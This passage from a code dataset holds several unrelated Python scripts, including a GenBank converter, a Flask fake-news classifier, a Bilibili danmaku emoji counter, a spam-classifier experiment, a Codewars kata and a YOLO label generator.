variables.validated, hedges.id, hedges.name, hedges.name_id, hedges.result, hedges.validated FROM variables, hedges, variables_hedges WHERE variables.id = variables_hedges.variable_id AND hedges.id = variables_hedges.hedge_id;')\n elif (self.uiModeCombo.currentData() == 5):\n self.fillTable('SELECT synonims.id, synonims.group_id, synonims.lemma, synonims.grammemes, synonims.hits, groups.is_variable, groups.is_term, groups.is_hedge FROM synonims, groups WHERE synonims.group_id = groups.id;')\n elif (self.uiModeCombo.currentData() == 6):\n self.fillTable('SELECT rules.id, rules.name, rules.antecedent_id, rules.consequent_id, rules.validated FROM rules;')\n elif (self.uiModeCombo.currentData() == 7):\n self.fillTable('SELECT nodes.id, nodes.parent_id, types.name, nodes.variable_id, nodes.term_id, nodes.hedge_id FROM nodes, types WHERE nodes.type_id = types.id;')\n else:\n self.uiDataTable.setEnabled(False)\n self.uiDataTable.clear()\n self.uiDataTable.setRowCount(0)\n self.uiDataTable.setColumnCount(0)\n\n # Actions on main window\n\n def onTabChanged(self):\n if (self.uiTabs.currentIndex() == 0):\n self.loadTerms()\n self.loadHedges()\n self.onVariableSelected()\n elif (self.uiTabs.currentIndex() == 4):\n self.uiModeCombo.setCurrentIndex(-1)\n\n def __del__(self):\n self.conn.close()\n","sub_path":"expert.py","file_name":"expert.py","file_ext":"py","file_size_in_byte":53090,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"398443002","text":"import re\r\nfh = open('insulin.gbk', 'r')\r\nlines = []\r\nfor l in fh:\r\n if l.startswith('ACCESSION'):\r\n l = l.strip('\\n')\r\n field1 = l.split(' ')[-1]\r\n \r\n if re.findall(r'ORGANISM', l):\r\n l = l.strip('\\n')\r\n field2 = l.split(' ')[-2] + ' ' + l.split(' ')[-1]\r\n\r\n if l.startswith('ORIGIN'):\r\n for l in fh:\r\n l = l.strip('\\n')\r\n l = l.strip(' ')\r\n l = ''.join([i for i in l if not i.isdigit()])\r\n l = l.replace(' ','')\r\n lines.append(l.upper())\r\n \r\nout = open('output.txt', 'w')\r\nout.write('>'+field1+'|'+field2+'\\n')\r\n\r\nfor l in lines[0:-1]:\r\n out.write(l+'\\n')\r\n \r\nout.close()\r\nfh.close()","sub_path":"exam/Final_exam and 
mid_term/converter.py","file_name":"converter.py","file_ext":"py","file_size_in_byte":708,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"232382404","text":"#Importing the Libraries\n\n#flask is use for run the web application.\nimport flask\n#request is use for accessing file which was uploaded by the user on our application.\nfrom flask import Flask, request,render_template \nfrom flask_cors import CORS\n\n#Python pickle module is used for serializing\n# and de-serializing a Python object structure.\nimport pickle\n\n#OS module in python provides functions for interacting with the operating system\nimport os\n\n#Newspaper is used for extracting and parsing newspaper articles.\n#For extracting all the useful text from a website.\nfrom newspaper import Article\n\n#URLlib is use for the urlopen function and is able to fetch URLs.\n#This module helps to define functions and classes to open URLs \nimport urllib\n\n#Loading Flask and assigning the model variable\napp = Flask(__name__)\nCORS(app)\napp=flask.Flask(__name__,template_folder='templates')\n\nwith open('model.pkl', 'rb') as handle:\n model = pickle.load(handle)\n\n\n@app.route('/') #default route\ndef main():\n return render_template('main.html')\n\n#Receiving the input url from the user and using Web Scrapping to extract the news content\n\n#Route for prediction\n\n@app.route('/predict',methods=['GET','POST'])\n\n\ndef predict():\n\t#Contains the incoming request data as string in case.\t\n url =request.get_data(as_text=True)[5:]\n\t\n\t#The URL parsing functions focus on splitting a URL string into its components, \n\t#or on combining URL components into a URL string.\n url = urllib.parse.unquote(url)\n\t\n\t#A new article come from Url and convert onto string\n article = Article(str(url))\t\n\t\n\t#To download the article \n article.download()\n\t\n\t#To parse the article \n article.parse()\n\t\n\t#To perform natural language processing ie..nlp\n article.nlp()\n\t#To extract summary \n news = article.summary\n print(type(news))\n\n #Passing the news article to the model and returing whether it is Fake or Real\n pred = model.predict([news])\n print(pred)\n return render_template('main.html', prediction_text='The news is \"{}\"'.format(pred[0]))\n \nif __name__==\"__main__\":\n port=int(os.environ.get('PORT',5000))\n app.run(port=port,debug=True,use_reloader=False)","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":2165,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"353432689","text":"import os\nimport time\nimport pickle\nimport hyperloglog\nfrom biliminer.Helper import *\n\nclass Emoj:\n def __init__(self, emo):\n self.emo = emo\n self.count = 0\n self.dic = dict()\n\n def __le__(self, other):\n return self.count <= other.count\n\n def __lt__(self, other):\n return self.count < other.count\n\n def __str__(self):\n return str((self.emo, self.count))\n\n def add(self, timestamp):\n self.count += 1\n Emoc.add_month(timestamp, self.dic)\n\n\nclass Emoc:\n\n def __init__(self):\n # self.unique = set()\n self.hll = hyperloglog.HyperLogLog(0.01)\n\n self.files_sofar = 0\n self.clock = 0\n\n self.first = set()\n self.nes = set()\n self.sec = list()\n self.emo_counter = list()\n self.emo_user_counter = dict()\n self.emo_month_counter = dict()\n self.danmaku_month_counter = dict()\n\n self.file_num = 0\n self.danmaku_num = 0\n self.file_emo_num = 0\n\n self.file_meng = 0\n self.file_233_num = 0\n 
self.file_ka_num = 0\n self.file_sb_num = 0\n self.file_xxs_num = 0\n\n self.num233 = 0\n self.xiaoxuesheng_num = 0\n self.ka_num = 0\n self.sb_num = 0\n self.meng_num = 0\n self.meng_counter = dict()\n\n self.emo_user_counter = dict()\n self.emo_month_counter = dict()\n self.danmaku_month_counter = dict()\n\n self.last_file = 0\n\n with open(\"first.txt\", \"r\") as file:\n line = file.readline().rstrip()\n for char in line:\n self.first.add(char)\n\n with open(\"nes.txt\", \"r\") as file:\n line = file.readline().rstrip()\n for char in line:\n self.nes.add(char)\n\n with open(\"sec.txt\", \"r\") as file:\n for line in file:\n self.sec.append(line.rstrip())\n\n with open(\"total.txt\", \"r\") as file:\n for line in file:\n self.emo_counter.append(Emoj(line.rstrip()))\n\n def count_233(self, danmaku):\n if \"233\" in danmaku:\n self.num233 += 1\n\n def count_xiaoxuesheng(self, danmaku):\n if \"小学生\" in danmaku:\n self.xiaoxuesheng_num += 1\n\n def count_meng(self, danmaku, creation_time):\n if \"萌\" in danmaku:\n self.add_month(creation_time, self.meng_counter)\n self.meng_num += 1\n\n def count_ka(self, danmaku):\n if \"卡\" in danmaku:\n self.ka_num += 1\n\n def count_sb(self, danmaku):\n if \"sb\" in danmaku or \"Sb\" in danmaku or \"SB\" in danmaku or \"傻\" in danmaku:\n self.sb_num += 1\n\n def should_check(self, line_set):\n if not (line_set & self.first):\n return False\n else:\n return True\n\n def first_check(self, line_set):\n if line_set & self.nes:\n return True\n else:\n return False\n\n def second_check(self, line):\n for item in self.sec:\n if item in line:\n return True\n return False\n\n def add_emo(self, line, user, creation_time):\n for emoj in self.emo_counter:\n if emoj.emo in line:\n emoj.add(creation_time)\n # print(line, emoj)\n self.deal_user(user)\n self.emo_add_month(creation_time)\n\n def count_emoj(self, line, user, creation_time):\n line_set = set(line)\n if self.should_check(line_set):\n if self.first_check(line_set) or self.second_check(line):\n self.add_emo(line, user, creation_time)\n\n def add_user(self, user):\n self.hll.add(user)\n\n @staticmethod\n def is_danmaku_file(filename):\n parts = filename.split('.')\n if parts[-1] != \"txt\":\n return False\n else:\n try:\n i = int(parts[0])\n except ValueError:\n return False\n else:\n return i > 0\n\n def dealer(self):\n location = input(\"location:\\n\")\n if location[-1] != \"/\":\n location += \"/\"\n dirs = os.listdir(location)\n\n self.clock = time.clock()\n for dc in dirs:\n print(dc)\n sublocation = location + str(dc)\n print(sublocation)\n if not os.path.isdir(sublocation):\n continue\n\n files = os.listdir(sublocation)\n if sublocation[-1] != \"/\":\n sublocation += \"/\"\n\n for filedir in files:\n\n if not self.is_danmaku_file(filedir):\n continue\n\n self.last_file = filedir\n self.file_num += 1\n self.files_sofar += 1\n if self.files_sofar % 1000 == 0:\n print(filedir, \"speed: \", 1000 / (time.clock() - self.clock))\n self.clock = time.clock()\n\n xxs = self.xiaoxuesheng_num\n sb = self.sb_num\n ka = self.ka_num\n n233 = self.num233\n meng = self.meng_num\n\n emo = self.get_total_emo_num()\n\n with open(sublocation + filedir, \"r\") as file:\n self.deal_file(file)\n\n if xxs < self.xiaoxuesheng_num:\n self.file_xxs_num += 1\n if sb < self.sb_num:\n self.file_sb_num += 1\n if ka < self.ka_num:\n self.file_ka_num += 1\n if n233 < self.num233:\n self.file_233_num += 1\n if emo < self.get_total_emo_num():\n self.file_emo_num += 1\n if meng < self.meng_num:\n self.file_meng += 1\n\n def 
deal_file(self, file):\n for line in file:\n danmaku_info = line.rstrip().split(\"$#$\")\n try:\n danmaku = danmaku_info[0]\n user = int(\"0x\" + danmaku_info[1], base=16)\n creation_time = int(danmaku_info[2])\n except:\n continue\n else:\n self.danmaku_num += 1\n self.danmaku_add_month(creation_time)\n\n self.count_emoj(danmaku, user, creation_time)\n self.add_user(danmaku_info[1])\n # self.unique.add(danmaku_info[1])\n self.count_ka(danmaku)\n self.count_233(danmaku)\n self.count_xiaoxuesheng(danmaku)\n self.count_sb(danmaku)\n self.count_meng(danmaku, creation_time)\n\n def deal_user(self, user):\n num = self.emo_user_counter.get(user, 0)\n self.emo_user_counter[user] = num + 1\n\n def get_total_emo_num(self):\n counter = 0\n for emoj in self.emo_counter:\n counter += emoj.count\n return counter\n\n def pickle_this(self):\n with open(str(self.last_file)[:-4] + \"emoc.pkl\", \"wb\") as pk:\n pickle.dump(self, pk)\n\n @staticmethod\n def restore_pkl():\n pic = input(\"pickle file name: \\n\")\n with open(pic, \"rb\") as pk:\n return pickle.load(pk)\n\n @staticmethod\n def get_year_month(timestamp):\n localtime = time.localtime(timestamp)\n return localtime.tm_year, localtime.tm_mon\n\n @staticmethod\n def add_month(timestamp, dictionary):\n year_month = Emoc.get_year_month(timestamp)\n value = dictionary.get(year_month, 0)\n dictionary[year_month] = value + 1\n\n def danmaku_add_month(self, timestamp):\n self.add_month(timestamp, self.danmaku_month_counter)\n\n def emo_add_month(self, timestamp):\n self.add_month(timestamp, self.emo_month_counter)\n\n def __str__(self):\n return str((\"user: \" + str(len(self.hll)), \"files: \" + str(self.file_num), \"emo_files: \"+ str(self.file_emo_num),\n \"meng_files: \" + str(self.file_meng),\n \"233_files: \" + str(self.file_233_num), \"sb_files: \" + str(self.file_sb_num),\n \"ka_files: \" + str(self.file_ka_num), \"xxs_files: \" + str(self.file_xxs_num),\n \"danmakus: \" + str(self.danmaku_num),\n \"emo: \" + str(self.get_total_emo_num()),\n \"meng: \" + str(self.meng_num),\n \"233: \" + str(self.num233),\n \"ka: \" + str(self.ka_num), \"xxs: \" + str(self.xiaoxuesheng_num), \"sb: \" + str(self.sb_num)))\n\n def print_emo_counter(self):\n print(\"********** emo counter **********\")\n self.emo_counter.sort(reverse=True)\n for emoj in self.emo_counter:\n if emoj.count > 0:\n print(emoj)\n self.print_dict(emoj.dic)\n\n @staticmethod\n def print_dic_size(dictionary):\n print(len(dictionary.keys()))\n\n def print_user_counter(self):\n print(\"*\" * 10 + \" user emo counter\" + \"*\" * 10)\n self.print_dic_size(self.emo_user_counter)\n # self.print_dict(self.emo_user_counter)\n\n def print_danmaku_month_counter(self):\n print(\"********** danmaku month counter **********\")\n self.print_dict(self.danmaku_month_counter)\n\n def print_emo_month_counter(self):\n print(\"*\" * 10 + \" emo month counter \" + \"*\" * 10)\n self.print_dict(self.emo_month_counter)\n\n def print_meng_counter(self):\n print(\"*\" * 10 + \" meng month counter \" + \"*\" * 10)\n self.print_dict(self.meng_counter)\n\n @staticmethod\n def print_dict(dictionary):\n dic = dict_to_sorted_list(dictionary)\n for monthyear, count in dic:\n print(monthyear, \" \", count)\n\n\ndef deal_pickle():\n choice = input(\"Delete pkl? 
('YES' to delete)\\n\")\n try:\n if choice == \"YES\":\n os.popen(\"rm /Users/billlai/workspace/python/bilimining/biliminer/emoc.pkl\")\n except Exception as e:\n print(e)\n\n\ndef deal():\n deal_pickle()\n print(time.localtime())\n start_time = time.clock()\n try:\n if input(\"New pickle? (YES)\\n\") == \"YES\":\n e = Emoc()\n else:\n e = Emoc.restore_pkl()\n print(\"Restored!\")\n e.files_sofar = 0\n\n except Exception as exception:\n print(exception)\n else:\n try:\n e.dealer()\n except KeyboardInterrupt:\n pass\n except Exception as exception:\n print(exception)\n finally:\n print(time.clock() - start_time)\n e.pickle_this()\n print(\"Pickled!\")\n print(\"Last danmaku num: \", e.last_file)\n\n\ndef show(e=None):\n if not e:\n try:\n e = Emoc.restore_pkl()\n print(\"Restored!\")\n except:\n print(\"Error: No emoc found!\")\n exit(1)\n\n # print(len(e.sec))\n # for i in e.emo_counter:\n # print(i)\n print(e)\n # count, l = count_meng_emo(e.emo_counter)\n # print(count)\n # for i in l:\n # print(i)\n # for i in count_to_year(e.emo_month_counter):\n # print(i)\n e.print_user_counter()\n e.print_danmaku_month_counter()\n e.print_emo_month_counter()\n e.print_meng_counter()\n e.print_emo_counter()\n\n\nif __name__ == \"__main__\":\n choice = input(\"Show(default) or Deal(d)\\n\")\n if choice == \"d\":\n deal()\n else:\n show()\n","sub_path":"biliminer/emo_counter.py","file_name":"emo_counter.py","file_ext":"py","file_size_in_byte":11264,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"632720592","text":"import os\nimport pandas as pd\nimport numpy as np\n\npastaT = 'C:/Users/brunn/Google Drive/Doutorado/Resultados/Artigo GRRS/Analise IND/'\npastaI = 'C:/Users/brunn/Google Drive/Doutorado/Resultados/Artigo GRRS/Analise TRAN/'\n\ncaminhosT = [os.path.join(pastaT, nome) for nome in os.listdir(pastaT)]\ncaminhosI = [os.path.join(pastaI, nome) for nome in os.listdir(pastaI)]\n\nnomes = ['Co-training - KNN', \n 'Co-training - LR', \n 'Co-training - MLP',\n 'Co-training - NB',\n 'Co-training - RF',\n 'Co-training - SVM',\n 'SEEDED K-means',\n 'Proposed Model', \n 'Self-Training - KNN', \n 'Self-Training - lR', \n 'Self-Training - MLP', \n 'Self-Training - NB', \n 'Self-Training - RF', \n 'Self-Training - SVM',\n 'Tri-Training - KNN', \n 'Tri-Training - LR',\n 'Tri-Training - MLP',\n 'Tri-Training - NB',\n 'Tri-Training - RF',\n 'Tri-Training - SVM']\n\n#resultado = pd.DataFrame()\n\ninfo = []\ncolunas = ['MODELO','50','D50', '100','D100', '150','D150', '200','D200', '250','D250', '300','D300']\nfor i, caminho in enumerate(caminhosT):\n \n dados = pd.read_csv(caminho)\n acuracia = np.round(dados['ACURACIA'].values, 3)\n dpa = np.round(dados['DPA'].values, 3)\n kappa = np.round(dados['KAPPA'].values, 3)\n dpk = np.round(dados['DPK'].values, 3)\n \n linha_acuracia = []\n linha_acuracia.append(nomes[i])\n for i, a in enumerate(acuracia):\n linha_acuracia.append(a)\n linha_acuracia.append(dpa[i])\n info.append(linha_acuracia)\n\nresultado = pd.DataFrame(info, columns=colunas)\nresultado.to_csv('C:/Users/brunn/Google Drive/Doutorado/Resultados/Artigo GRRS/Analise Final/resultado_transdutivo.csv', index=False)\n \n ","sub_path":"graficos_resultados.py","file_name":"graficos_resultados.py","file_ext":"py","file_size_in_byte":1782,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"111566148","text":"from unittest import main as start_test\nfrom unittest import TestCase\n\n\ndef accum(s):\n 
\"\"\"\"Mumbling\" - https://www.codewars.com/kata/5667e8f4e3f572a8f2000039/train/python\"\"\"\n result = \"\"\n # dump our string into a list, lowercased while we're at it\n l = list(s.lower())\n # for every character in the list\n for c in l:\n # grab its index\n iindex = l.index(c)\n # while the index is not negative\n while iindex > -1:\n # append the character to the result\n result += c\n # decrement the index\n iindex -= 1\n # tack a space onto the end as well\n result += \" \"\n # here goes a workaround to avoid trouble with 'l.index(c)',\n # since that call returns the index of the first matching element\n # found out about enumerate here - https://docs.python.org/2.3/whatsnew/section-enumerate.html\n for i, num in enumerate(l):\n # if we hit our character from the loop above\n if num == c:\n # replace it with something unlikely to show up in the tests\n l[i] = '╨' # could also use '\udce2', by the way\n # and then drop out of this loop\n break\n\n # and the logic here is:\n # 1. camel-case the words (luckily there is such a thing as 'title()')\n # 2. then slice off the last element (that very 'result += \" \"')\n # 3. and then replace all the spaces with '-'\n return result.title()[:-1].replace(\" \", \"-\")\n\n\n# and the kata's suggested solutions have this one-liner: 'return '-'.join(c.upper() + c.lower() * i for i, c in enumerate(s))'\n# I really overcomplicated this one :D\n\n\nclass TestGreet(TestCase):\n def test_simple(self):\n self.assertEqual(accum(\"abc\"), \"A-Bb-Ccc\")\n\n def test_extra(self):\n self.assertEqual(accum(\"ZpglnRxqenU\"),\n \"Z-Pp-Ggg-Llll-Nnnnn-Rrrrrr-Xxxxxxx-Qqqqqqqq-Eeeeeeeee-Nnnnnnnnnn-Uuuuuuuuuuu\")\n self.assertEqual(accum(\"NyffsGeyylB\"),\n \"N-Yy-Fff-Ffff-Sssss-Gggggg-Eeeeeee-Yyyyyyyy-Yyyyyyyyy-Llllllllll-Bbbbbbbbbbb\")\n self.assertEqual(accum(\"MjtkuBovqrU\"),\n \"M-Jj-Ttt-Kkkk-Uuuuu-Bbbbbb-Ooooooo-Vvvvvvvv-Qqqqqqqqq-Rrrrrrrrrr-Uuuuuuuuuuu\")\n self.assertEqual(accum(\"EvidjUnokmM\"),\n \"E-Vv-Iii-Dddd-Jjjjj-Uuuuuu-Nnnnnnn-Oooooooo-Kkkkkkkkk-Mmmmmmmmmm-Mmmmmmmmmmm\")\n self.assertEqual(accum(\"HbideVbxncC\"),\n \"H-Bb-Iii-Dddd-Eeeee-Vvvvvv-Bbbbbbb-Xxxxxxxx-Nnnnnnnnn-Cccccccccc-Ccccccccccc\")\n\n\nif __name__ == '__main__':\n start_test()\n","sub_path":"src/code_wars/mumbling.py","file_name":"mumbling.py","file_ext":"py","file_size_in_byte":3095,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"}
+{"seq_id":"644899460","text":"import csv\n\nfrom scipy.sparse import csr_matrix\nfrom sklearn.svm import SVC\n\nfrom Services import SpamTools\nimport ast\nimport operator\nfrom sklearn.feature_extraction.text import CountVectorizer\nfrom sklearn.feature_extraction.text import TfidfTransformer\nfrom sklearn.naive_bayes import MultinomialNB\n\nimport numpy as np\n\ncsvData = []\ni = 0\ntestData = []\n\nwith open('../Etc/test2.csv', 'rt', encoding=\"utf8\") as f:\n reader = csv.DictReader(f)\n\n for row in reader:\n tweet_id = row[\"tweet_id\"].strip()\n clear_text = row[\"clear_text\"].strip()\n\n spam = False\n irrelevante = False\n\n # print \"c: {} - s: {} | i: {}\".format(clear_text, spam, irrelevante)\n csvData.append((clear_text, spam))\n\ngeten = csvData[:20]\ntarg = []\ntweets = []\nfeatureVector = {}\n\n\ndef updateVector(features):\n for feature in features:\n try:\n featureVector[feature] = featureVector[feature] + 1\n except:\n featureVector[feature] = 1\n\n\ndef removeFrequencyFromVector(qtd):\n featureVectors = {k: v for k, v in featureVector.items() if v > qtd}\n fileredVector = sorted(featureVectors.items(), key=operator.itemgetter(1))\n return list(map(lambda x: x[0], 
fileredVector))\n\n\ndef removeFrequencyFromTweets():\n newTweets = []\n\n for tweet in tweets:\n newTweets.append(\" \".join(list(filter(lambda x: x in featureVector, tweet))))\n return newTweets\n\n\nfor obj in geten:\n\n if i % 2 == 0:\n spam = True\n else:\n spam = False\n\n i = i + 1\n\n testData.append({\"clear_text\": obj[0], \"is_spam\": spam})\n ww = SpamTools.getFeatureVector(obj[0], 2, [])\n updateVector(ww)\n tweets.append(ww)\n targ.append(spam)\n\nfeatureVector = removeFrequencyFromVector(0)\ntweets = removeFrequencyFromTweets()\nprint(featureVector)\n\n\ncount_vect = CountVectorizer()\nX_train_counts = count_vect.fit_transform(tweets)\n\ntfidf_transformer = TfidfTransformer()\nX_train_tfidf = tfidf_transformer.fit_transform(X_train_counts)\n\ndef save_sparse_csr(array):\n np.savez('../Etc/trainingTest2.npz', data=array.data, indices=array.indices,\n indptr=array.indptr, shape=array.shape)\n\ndef load_sparse_csr():\n loader = np.load('../Etc/trainingTest2.npz')\n return csr_matrix((loader['data'], loader['indices'], loader['indptr']), shape=loader['shape'])\n\nsave_sparse_csr(X_train_tfidf)\nf = open('../Etc/isSpamList.txt', 'w')\nf.write(str(targ))\n\nf = open('../Etc/featureVector.txt', 'w')\nf.write(str(featureVector))\n\nf = open('../Etc/tweetsTraining.txt', 'w')\nf.write(str(tweets))\n\ntraining_set = load_sparse_csr()\n\ndocs_new = ['are we sure this season is', 'never change, bronn', 'remembering the last episode is in 30 minutes', 'hound was looking for a']\ndocs_processed = []\nfor nd in docs_new:\n docs_processed.append(SpamTools.getTweetFeatureVectorString(nd, featureVector))\n\nprint(\"docs_processed: {}\".format(docs_processed))\n\n# TODO -> This was the part I had not included in the PoC\n\"\"\"count_vect = CountVectorizer()\ncount_vect.fit_transform(tweets)\"\"\"\n\nX_new_counts = count_vect.transform(docs_new)\nX_new_tfidf = tfidf_transformer.transform(X_new_counts)\n\n\nclf = MultinomialNB().fit(training_set, targ)\npredicted = clf.predict(X_new_tfidf)\n\nprint(\"\\n\\nNB:\\n\")\nprint(\"pred: {}\".format(predicted))\n\nfor doc, category in zip(docs_new, predicted):\n print('%r => %s' % (doc, category))\n\nclfS = SVC().fit(training_set, targ)\npredictedS = clfS.predict(X_new_tfidf)\n\nprint(\"\\n\\nSVM:\\n\")\n\nprint(\"pred: {}\".format(predictedS))\n\nfor doc, category in zip(docs_new, predictedS):\n print('%r => %s' % (doc, category))","sub_path":"Scripts/TrainingTestScikit.py","file_name":"TrainingTestScikit.py","file_ext":"py","file_size_in_byte":3590,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"}
+{"seq_id":"625309784","text":"import pandas as pd\r\nimport plotly.express as px\r\ndf=pd.read_csv(\"Copy+of+data+-+data.csv\")\r\nfigure=px.bar(df,x=\"date\",y=\"cases\")\r\nfigure.show()\r\ndata=df[\"cases\"].tolist()\r\ndata.sort()\r\ntotal=0\r\nfor i in range(0,len(data)):\r\n total=total+data[i]\r\nmean=total/ len(data)\r\nprint(mean)\r\nif(len(data)%2==1):\r\n median=data[int(len(data)/2)]\r\nelse:\r\n median=(data[int(len(data)/2)-1]+data[int(len(data)/2)])/2\r\nprint(median)","sub_path":"mean.py","file_name":"mean.py","file_ext":"py","file_size_in_byte":339,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"}
+{"seq_id":"522478763","text":"import json\nfrom pprint import pprint\nimport csv\n#with open('timemaps/1.json', 'w+') as outfile:\nwith open('previousMC.csv', 'a+', newline='') as csvfile:\n\tfieldnames = ['Memento_Count']\n\twriter = csv.DictWriter(csvfile, fieldnames=fieldnames)\n\twriter.writeheader()\n\tcsvfile.close()\n\nfor i in 
range(1,1001):\n\ttry:\t\n\t\t#loading json data if file is with .json extension\n\t\tjson_file = 'timemaps/' + str(i) +'.json'\n\t\tjson_data=open(json_file)\n\t\tdata = json.load(json_data)\n\t\t#accesing the number of mementos by counting number of keys in list\n\t\tj = data['mementos']['list']\n\t\t#pprint(len(j))\n\t\tjson_data.close()\n\t\tmementocount=len(j)\n\t\tjson_data.close()\n\t\twith open('previousMC.csv', 'a+', newline='') as csvfile:\n\t\t\tfieldnames = ['Memento_Count']\n\t\t\twriter = csv.DictWriter(csvfile, fieldnames=fieldnames)\n\t\t\twriter.writerow({'Memento_Count': mementocount})\n\t\t\tcsvfile.close()\n\texcept:\n\t\tmementocount=0\n\t\t# memento count is zero if file extension is txt\n\t\twith open('previousMC.csv', 'a+', newline='') as csvfile:\n\t\t\tfieldnames = ['Memento_Count']\n\t\t\twriter = csv.DictWriter(csvfile, fieldnames=fieldnames)\n\t\t\twriter.writerow({'Memento_Count': mementocount})\n\t\t\tcsvfile.close()\n\t\tpass\n\n\t#j = json.loads(outfile.read())\n\t#print (j[''])\n\t#outfile.close","sub_path":"Assignments/A9/check.py","file_name":"check.py","file_ext":"py","file_size_in_byte":1248,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"339458100","text":"#! /usr/bin/env python\n\nimport numpy as np\nimport pandas as pd\nimport matplotlib.pyplot as plt\n\n##\n## Read in the data\n##\nampO1, phaseO1 = np.loadtxt('MFS1_phases.O1', usecols=[1,2], unpack=True)\n#ampO2, phaseO2 = np.loadtxt('MFS2_phases.O1', usecols=[1,2], unpack=True)\n\nampM1, phaseM1 = np.loadtxt('MFS1_phases.M2', usecols=[1,2], unpack=True)\n#ampM2, phaseM2 = np.loadtxt('MFS2_phases.M2', usecols=[1,2], unpack=True)\n\n#dt=10.0/60.0\n#time=dt*np.arange(len(ampO1))/24\nwindow=np.arange(1,len(ampO1)+1)\n\nplt.ion()\n\nplt.figure(3)\nplt.subplot(2,1,1)\nplt.grid(True)\n#plt.gca().invert_yaxis()\n#plt.xlim(-50,450)\n#plt.ylim(4,0)\nplt.plot(window, ampO1, 'ro-', label='MFS1 O1')\nplt.plot(window, ampM1, 'ro--', label='MFS1 M2')\nplt.ylabel('Amplitude')\nplt.title('MFS Tidal analysis -- Well MFS1')\n#plt.legend(loc='upper left')\nplt.legend(loc='best')\nplt.subplot(2,1,2)\nplt.grid(True)\n#plt.gca().invert_yaxis()\n#plt.xlim(-50,450)\n#plt.ylim(4,0)\nplt.plot(window, phaseO1, 'ro-', label='MFS1 O1')\nplt.plot(window, phaseM1, 'ro--', label='MFS1 M2')\nplt.xlabel('Window')\nplt.ylabel('Phase')\nplt.legend(loc='best')\n\nplt.savefig('MFS1_Phases.pdf')\n\nplt.show()\n","sub_path":"1_Data/PlotTideAnal_MFS1.py","file_name":"PlotTideAnal_MFS1.py","file_ext":"py","file_size_in_byte":1145,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"510732004","text":"import argparse\nimport glob\nimport os\nimport pickle\nfrom random import shuffle\nfrom csvloader import LABEL_NAMES\nfrom utils import get_train_test_meta_data, get_train_test_base\n\nparser = argparse.ArgumentParser(description='Process images for new dataset')\nparser.add_argument('-c', '--config', dest='config_path', required=True)\nparser.add_argument('--train_background',\n default=0, help='Number of background images to include in training', type=int)\nparser.add_argument('--test_background',\n default=0, help='Number of background images to include in testing', type=int)\nparser.add_argument('-bg_dir', '--background_directory', dest='background_directory', required=False)\n\nargs = parser.parse_args()\n\nif not args.background_directory is None:\n if not os.path.isdir(args.background_directory):\n print(\"Background directory 
given does not exist: %s\" % args.background_directory)\n quit()\nif (args.train_background > 0 or args.test_background > 0) and args.background_directory is None:\n print(\"Must give a background directory if # of test or train background chips to include is over 0.\")\n quit()\n\n# Load the configuration\nconfig = None\ntry:\n pickle_file_path = args.config_path\n pickle_file = open(pickle_file_path,'rb')\n config = pickle.load(pickle_file)\n\nexcept:\n raise Exception(\"Could not load file \" + pickle_file_path)\n\nLABELS = []\n\ntrain_base, test_base = get_train_test_base(config)\ntrain_meta, test_meta = get_train_test_meta_data(config)\n\nbackground_paths = []\nif args.train_background > 0 or args.test_background > 0:\n background_paths = glob.glob(os.path.join(args.background_directory, '*.jpg'))\nif args.train_background + args.test_background > len(background_paths):\n print(\"Not enough background images, in total there are %d images.\" % len(background_paths))\n quit()\n\nshuffle(background_paths)\n\ntrain_background_paths = []\ntest_background_paths = []\nif args.train_background > 0:\n train_background_paths = background_paths[:args.train_background]\nif args.test_background > 0:\n test_background_paths = background_paths[args.train_background:args.train_background + args.test_background]\n\n\ndef yolo_labels(meta, base):\n unique_classes = set()\n for img_filename in meta:\n txt_file_name = os.path.splitext(img_filename)[0] + \".txt\"\n m = meta[img_filename]\n h,w = m.crop.height, m.crop.width\n labels = []\n for hs in m.hotspots:\n center_x = hs.center_x/w\n center_y = hs.center_y/h\n box_w = hs.width/w\n box_h = hs.height/h\n lbl_idx = hs.label[0]\n label = LABEL_NAMES[lbl_idx]\n if label not in LABELS:\n LABELS.append(label)\n class_id = LABELS.index(label)\n unique_classes.add(class_id)\n labels.append(\"%d %.10f %.10f %.10f %.10f\" % (class_id, center_x, center_y, box_w, box_h))\n\n with open(os.path.join(base, txt_file_name), 'w') as f:\n for label in labels:\n f.write(\"%s\\n\" % label)\n return unique_classes\n\ndef image_list(meta, base, background_images, list_name = \"yolo.labels\"):\n list_file = os.path.join(base, list_name)\n all_filles = []\n for img_filename in meta:\n full_path = os.path.join(base, img_filename)\n all_filles.append(full_path)\n all_filles = all_filles + background_images\n\n shuffle(all_filles)\n\n with open(list_file, 'w') as f:\n for img in all_filles:\n f.write(\"%s\\n\" % img)\n\n return list_file\n\ndef gen_data_file(train_list, test_list, classes):\n names_file = os.path.join(config.generated_data_base, config.dataset_path,\"yolo.names\")\n backup_dir = os.path.join(config.generated_data_base, config.dataset_path,\"backup\")\n with open(names_file, 'w') as f:\n for c in classes:\n f.write(LABELS[c] + \"\\n\")\n data_content = \\\n \"classes = %d\\ntrain = %s\\nvalid = %s\\ntest = %s\\nnames = %s\\nbackup = %s\\n\" \\\n % (len(classes), train_list, test_list, test_list, names_file, backup_dir)\n data_file = os.path.join(config.generated_data_base, config.dataset_path,\"yolo.data\")\n\n with open(data_file, 'w') as f:\n f.write(data_content)\n\n\n\n\nunique_train = yolo_labels(train_meta, train_base)\nunique_test = yolo_labels(test_meta, test_base)\nclasses = list(unique_test.union(unique_train))\n\n\ntrain_list = image_list(train_meta, train_base, train_background_paths)\ntest_list = image_list(test_meta, test_base, test_background_paths)\ngen_data_file(train_list, test_list, 
